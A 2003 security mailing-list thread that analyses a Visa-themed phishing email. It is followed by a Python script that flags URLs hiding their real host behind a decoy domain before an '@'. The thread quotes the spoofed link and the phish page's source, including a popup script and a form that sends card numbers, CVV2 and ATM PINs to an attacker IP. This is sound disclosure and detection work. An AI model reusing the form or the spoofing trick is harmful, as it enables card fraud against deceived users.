My bad, it was just pointed out to me that redirection between @ and %01@ are different things. I don't mean to take shots at the Xforce guys.
Thanks guys.

>-----Original Message-----
>From: [EMAIL PROTECTED]
>[mailto:[EMAIL PROTECTED] On Behalf Of Gary Flynn
>Sent: Tuesday, December 23, 2003 9:30 AM
>To: Mauro Flores
>Cc: [EMAIL PROTECTED]
>Subject: Re: [Full-Disclosure] visa XSS?
>
>Mauro Flores wrote:
>
>> I received this mail today; the funny stuff is that when you click on the
>> link, you execute:
>>
>> http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&[EMAIL PROTECTED]/~gotier/verified_by_visa.htm
>>
>> I don't have a Visa card and I don't like that 64.21.80.2, which is not a
>> Visa IP, AFAIK.
>> Anyone else receive it??
>
>Yeah. We just got one here. I missed the first part of this thread
>so I don't know if I'm repeating stuff.
>
>The original email came from an address registered in Korea.
>
>Although the present web site redirects to the VISA site, if you look at
>the source you'll find:
>
><HTML><HEAD>
><TITLE>Secure with Visa</TITLE>
><META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
><meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'>
><BODY>
> <script language="JavaScript">
><!--
>
>
>// alert("popali");
> window.name="spec";
> window.open("http://64.21.80.2/~gotier/r.php", 'Visa',
>"resizable=no,scrollbars=no,width=425,height=198");
>// window.focus();
>//-->
></script>
></BODY></HTML>
>
>And that r.php is a phish:
>
>Please, enter your data info!<html>
><head>
><title>Enter your data</title>
></head>
><body>
><br>
><form method=post action=http://64.21.80.2/~gotier/r.php>
>Credit Card No. <input type=text name=cc value=''><br>
>CVV2 <input type=text name=cvv2 value=''><br>
>PIN-ATM CODE: <input type=text name=pin value=''><br>
>Expiration Date: month : <select name=month>
><option value=01>01
><option value=02>02
><option value=03>03
><option value=04>04
><option value=05>05
><option value=06>06
><option value=07>07
><option value=08>08
><option value=09>09
><option value=10>10
><option value=11>11
><option value=12>12
></select> year : <select name=year>
><option value=2003>2003
><option value=2004>2004
><option value=2005>2005
><option value=2006>2006
><option value=2007>2007
><option value=2008>2008
><option value=2009>2009
><option value=2010>2010
><option value=2011>2011
><option value=2012>2012
></select>
><br><br>
><input type=submit value='Send');
></form>
></body>
></html>
>
>--
>Gary Flynn
>Security Engineer - Technical Services
>James Madison University
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
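The link quoted in the thread works because everything between `http://` and the last `@` in the authority is the URL's userinfo (username and password), so the host the browser actually connects to is the one after the `@` (64.21.80.2), while the text before it (www.visa.com) is only a decoy. The following Python check is an added example, not code posted by anyone in this thread: it reports the host really contacted and any hostname-looking decoy in the userinfo. The sample URLs are constructed to resemble the thread's link (the redacted part is replaced with a placeholder `x`), and the `%01@` variant mentioned in the reply above is included; this parser splits both at the last `@` and does not model any browser's display quirks.

```python
"""Added example (not from the thread): show which host a URL that abuses the
userinfo part ("decoy-host@real-host") really points at, and flag it."""
import re
from urllib.parse import urlsplit, unquote

# Matches a domain-name-looking prefix such as "www.visa.com".
_DOMAIN_RE = re.compile(r"([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})")


def _authority(url: str) -> str:
    """Percent-decode the authority so 'www.visa.com%01@host' is analysed as
    'www.visa.com\\x01@host' (the '@' is what matters, not the bytes before it)."""
    return unquote(urlsplit(url).netloc)


def real_host(url: str) -> str:
    """Host the client actually connects to: the text after the LAST '@' in the
    authority, with any ':port' removed (bracketed IPv6 literals not handled)."""
    hostport = _authority(url).rsplit("@", 1)[-1]
    return hostport.split(":", 1)[0].lower()


def decoy_host(url: str):
    """Hostname-looking text in the userinfo (before the last '@'), or None.
    Control characters such as \\x01 are stripped before matching."""
    authority = _authority(url)
    if "@" not in authority:
        return None
    userinfo = authority.rsplit("@", 1)[0]
    userinfo = re.sub(r"[\x00-\x1f\x7f]", "", userinfo)
    m = _DOMAIN_RE.match(userinfo)
    return m.group(1).lower() if m else None


def is_userinfo_spoof(url: str) -> bool:
    """True when the userinfo carries a domain that differs from the real host."""
    decoy = decoy_host(url)
    return decoy is not None and decoy != real_host(url)


if __name__ == "__main__":
    # Constructed samples modelled on the thread's link; the redacted part is
    # replaced with the placeholder 'x'.
    samples = [
        "http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495"
        "&useroption=SecurityUpdate&x@64.21.80.2/~gotier/verified_by_visa.htm",
        "http://www.visa.com%01@64.21.80.2/~gotier/r.php",
        "http://www.usa.visa.com/personal/privacy_policy/",
        "http://user:pw@example.org:8080/",
    ]
    for u in samples:
        flag = "SPOOF" if is_userinfo_spoof(u) else "ok   "
        print(f"{flag} host={real_host(u)} decoy={decoy_host(u)} {u}")
```

The useful signal for mail filtering is `is_userinfo_spoof`: ordinary `user:pw@host` URLs carry no dotted domain in the userinfo and are not flagged, while a decoy domain that differs from the connected host is.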
